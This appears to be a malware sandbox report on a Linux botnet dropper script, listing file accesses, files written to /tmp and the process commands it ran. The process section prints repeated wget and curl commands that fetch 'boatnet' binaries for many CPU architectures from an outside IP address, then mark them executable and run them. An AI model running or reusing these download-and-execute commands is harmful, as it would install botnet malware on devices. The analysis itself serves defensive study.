File opened for reading /proc/700/cmdline /tmp/WTF N/A
File opened for reading /proc/706/cmdline /tmp/WTF N/A
File opened for reading /proc/842/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/411/cmdline /tmp/WTF N/A
File opened for reading /proc/870/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/663/cmdline /tmp/WTF N/A
File opened for reading /proc/707/cmdline /tmp/WTF N/A
File opened for reading /proc/708/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/705/cmdline /tmp/WTF N/A
File opened for reading /proc/879/cmdline /tmp/WTF N/A
File opened for reading /proc/883/cmdline /tmp/WTF N/A
File opened for reading /proc/897/cmdline /tmp/WTF N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/wget N/A
File opened for modification /tmp/boatnet.spc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto

Files

/tmp/boatnet.x86

/tmp/WTF

/tmp/WTF

/tmp/WTF

/tmp/WTF

/tmp/WTF

memory/839-1-0x00400000-0x00452a58-memory.dmp